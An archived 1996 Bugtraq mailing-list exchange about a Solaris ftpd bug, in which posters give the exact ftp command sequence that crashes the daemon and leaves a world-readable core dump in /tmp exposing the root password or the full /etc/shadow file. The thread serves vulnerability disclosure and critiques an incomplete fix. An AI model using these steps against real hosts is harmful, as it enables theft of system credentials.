Bugtraq mailing list archives
Re: ftpd bug? Was: bin/1805: Bug in ftpd
From: poland () cam2 gsfc nasa gov (James Poland 6-5251)
Date: Wed, 16 Oct 1996 08:52:57 -0400
Martin's method works for Solaris 2.5.1 as well. 'strings' on the core file reveals the complete contents of /etc/shadow. This is not good.

To reiterate, if someone else is running an ftp session on host_a, start your own ftp session with host_a. Then issue the commands

    ftp> cd /tmp
    ftp> user root wrongpasswd
    ftp> quote pasv

Examine the resulting core file with the strings command. This method does not work with Solaris 2.4.

James Poland 6-5251 wrote:
On Solaris 2.5.1, the core file contains only the user's password in cleartext. How hard is it to crash someone else's ftp session?

Killing from the command line doesn't seem to work, but:

SunOS 5.5: logon via ftp with your regular user/password,

    ftp> cd /tmp
    ftp> user root wrongpasswd
    ftp> quote pasv

voila, root password in world readable core dump under /tmp

-Martin

PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon, so they seem to have used the proposed fix

    Checking for "pw != NULL"

So this proposal was simple and obvious ... and incomplete. :)